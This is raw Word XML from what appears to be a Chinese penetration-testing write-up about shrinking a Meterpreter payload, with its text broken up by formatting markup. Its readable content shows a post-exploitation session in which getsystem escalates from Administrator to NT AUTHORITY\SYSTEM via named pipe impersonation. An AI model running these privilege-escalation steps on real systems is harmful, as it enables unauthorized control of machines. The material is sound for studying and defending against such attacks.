    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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meterpreter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996c38"/>
          <w:spacing w:val="10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getuid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8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="11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Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12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username:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="13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WIN03X64\Administrator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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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meterpreter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996c38"/>
          <w:spacing w:val="10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getpid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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Current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404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pid: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3152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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7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meterpreter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996c38"/>
          <w:spacing w:val="14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getsystem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="121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12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.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.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got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system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via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technique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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1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Named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Pipe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Impersonation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12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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In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Memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="10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Adm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404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8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meterpreter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996c38"/>
          <w:spacing w:val="17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  <w:spacing w:val="10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getuid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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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Server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username: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404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NT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AUTHORITY\SYSTEM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4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w w:val="105"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第四次优化payl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:w w:val="105"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oad：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de3f29"/>
          <w:w w:val="62"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:w w:val="62"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>...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42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文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中的前三次优化，三次生成，已满足大部分实战场景。当遇到更苛刻的实战场景，75776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w w:val="101"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>字节优化到317</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="101"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4字节，接下来的季中，会继续优化。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42" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="9599" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="111"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="111"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ropoor</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11920" w:h="16840"/>
      <w:pgMar w:header="0" w:footer="0"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altName w:val="Times New Roman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seFELayout/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3E94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 ?> 
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
	<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" /> 
	<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" />
	<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" />
	<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" /> 
	<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml" /> 
	<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" /> 
	<Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/7.jpeg" />
	<Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/8.jpeg" />
	<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/9.jpeg" />
	<Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/10.jpeg" />
	<Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/11.jpeg" />
	<Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/12.jpeg" />
	<Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/13.jpeg" />
	<Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/14.jpeg" />
	<Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/15.jpeg" />
	<Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/16.jpeg" />
	<Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/17.jpeg" />
	<Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/18.jpeg" />
	<Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/19.jpeg" />
	<Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/20.jpeg" />
	<Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/21.jpeg" />
	<Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/22.jpeg" />
	<Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/23.jpeg" />
	<Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/24.jpeg" />
	<Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/25.jpeg" />
	<Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/26.jpeg" />
	<Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/27.jpeg" />
	<Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/28.jpeg" />
	<Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/29.jpeg" />
	<Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/30.jpeg" />
	<Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/31.jpeg" />
	<Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/32.jpeg" />
	<Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/33.jpeg" />
	<Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/34.jpeg" />
	<Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/35.jpeg" />
	<Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/36.jpeg" />
	<Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/37.jpeg" />
	<Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/38.jpeg" />
	<Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/39.jpeg" />
	<Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/40.jpeg" />
	<Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/41.jpeg" />
	<Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/42.jpeg" />
	<Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/43.jpeg" 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1</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop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2011-11-21T14:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-11-21T15:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>